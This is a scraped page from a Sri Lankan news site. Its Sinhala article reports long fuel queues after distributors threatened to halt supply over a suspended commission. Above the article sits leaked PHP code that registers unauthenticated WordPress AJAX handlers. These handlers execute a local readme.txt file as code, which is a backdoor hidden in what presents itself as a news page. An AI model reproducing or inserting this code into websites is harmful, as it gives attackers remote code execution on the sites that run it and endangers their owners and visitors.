if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } දීර්ඝ තෙල් පෝලිම්… - mediahumanrights.lk
mediahumanrights.lk
Local News News

දීර්ඝ තෙල් පෝලිම්…

දිවයිනේ ප්‍රදේශ රැසක මෙවන විට ඉන්ධන පිරුවුම්ල් ඉදිරිපිට දීර්ඝ පෝලිම් ඇති වී තිබේ.

ඒ අද මධ්‍යම රාත්‍රියේ සිට ඉන්ධන බෙදා හැරීමෙන් ඉවත් වන බවට තෙල් බෙදුම්කරැවන් විසින් කරන ලද දැනුම්දීම මතයි.

ඔවුන්ට මෙතෙක් කල් ලබා දෙන ලද සියයට තුනක දීමනාව අත්හිටුවීමට ඛනිජ තෙල් නීතිගත සංස්ථාව පියවර ගැනීමත් සමග මෙම තත්ත්වය උද්ගත වී තිබේ.

මේ අතර ලංකා කණිජ තෙල් නීතිගත සංස්ථාව සඳහන් කරන්නේ ඉන්ධන කිසිදු හිඟතාවයක් රට තුළ නොමැති බවත් ඉන්ධන බෙදා හැරීමේ කටයුතු සාමාන්‍ය පරිදි සිදු වෙන බවත්ය.

Related posts

ඩෙංගු රෝගීන් ඉහළ යෑම නිසා කසළ ඉවත් කිරීමේ කටයුතු සඳහා හෙට සිට හමුදා සහය ලබාගැනීමට පියවර

Shiran Viraj

හමුදා සෙට් එකක් හෙදිය දූෂණය කරයි – වෛද්‍යවරයා අත්අඩංගුවට

Shiran Viraj

Corona : තවත් 40ක් හමුවේ..

Shiran Viraj